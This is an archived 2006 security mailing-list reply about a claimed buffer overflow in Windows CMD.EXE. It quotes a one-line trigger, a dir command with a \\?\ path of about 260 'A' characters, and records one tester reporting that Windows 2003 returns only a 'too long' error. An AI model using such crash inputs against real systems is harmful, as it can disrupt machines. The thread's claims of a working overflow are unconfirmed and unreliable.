Open Source and information security mailing list archives
 
Message-ID: <000b01c6f47e$904c6460$6601a8c0@snmovil>
Date: Fri, 20 Oct 2006 14:33:00 -0500
From: "Luis Alberto Cortes Zavala" <napasn@...uritynation.com>
To: <vuln-dev@...urityfocus.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows Command Processor CMD.EXE Buffer Overflow

Yeah! Buffer Overflow Windows XP SP2

I will debug this.

Luís Alberto Cortes Zavala
IT / Security Consultant
napa@...uritynation.com
http://www.securitynation.com



-----Original Message-----
From: listbounce@...urityfocus.com [mailto:listbounce@...urityfocus.com] On behalf of The SNiFF
Sent: Friday, October 20, 2006 03:58 a.m.
To: vuln-dev@...urityfocus.com
Subject: Re: Windows Command Processor CMD.EXE Buffer Overflow

> Copy-paste the following line in cmd.exe and execute it..
> (it is a single command, has been split into multiple lines for
> readability sake).
>
> %COMSPEC% /K "dir
>
\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
>
> (260 characters of 'A's)

Tried it on Win2k3 SP1:
C:\Documents and Settings\Administrator>%COMSPEC% /K 
"dir\\?\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
System replied:
The filename or extension is too long. 



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
